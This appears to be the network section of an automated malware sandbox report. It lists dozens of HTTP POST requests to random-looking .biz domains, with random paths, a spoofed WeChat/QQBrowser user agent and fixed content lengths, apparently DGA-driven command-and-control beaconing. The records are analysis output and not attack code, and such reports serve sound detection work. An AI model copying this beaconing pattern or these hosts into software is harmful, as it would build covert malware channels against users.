Source: global traffic	HTTP traffic detected: POST /qdsfjdjxkwbsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gkcaxlxcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iweslplsltjuljus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /vuaobjwmdbxko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rvac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /vdlffosnapnrfupl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hqcfmwvkngoxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ehonqic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /dgdkhxcfkna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yeeuocokpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /caxqycgeiaamd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /dhwxqyxtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ioeeuacevdof HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /spftv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rcdhheuvsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /thnor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /wbgwmpvkxxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pfoxkxwneqnmhcsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sattbfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qjmcjynbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hudnfeopxibfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dqsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /qjnulfbcbrtstm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gobhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dobp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uxri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /prvlplgfktyghiuq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gpnrhxymwwoww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sbrspaxifluxyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pyjgudwdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wktespcp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /xraiohcidq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /xykyylrqbfiyxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fqkauqnsnykhqmm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /fuhcig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /hnkvsfse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sfsrqtr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dboalvdlyo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ikvygvnodbxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bdtrq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /rtktsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /swl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yfkb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /rnre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fkekmmmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /lmccoqeoetyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mytb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /xdytdotbepaidw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jbtgiilqotksodi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ewwexq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hvyr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /uyciffjgsguvtk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /smxlcsofdvekwjcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /hlqwiqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kpfmyendmvbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /uitbt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /jfogdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /eaff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dhaqnsepv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /gkyxxtcmyqyikvyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
